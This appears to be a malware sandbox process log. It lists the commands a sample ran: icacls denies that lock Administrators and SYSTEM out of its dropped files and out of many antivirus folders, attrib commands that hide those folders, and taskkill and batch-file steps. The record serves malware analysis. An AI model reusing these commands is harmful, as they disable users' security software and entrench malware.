C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny система:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny система:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.execmd /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
C:\Windows\SysWOW64\cmd.execmd /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c C:\ProgramData\Microsoft\Intel\BLOCK.bat4⤵
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM iediagcmd.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\360\Total Security"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurity5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safe5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Avira5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESET5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
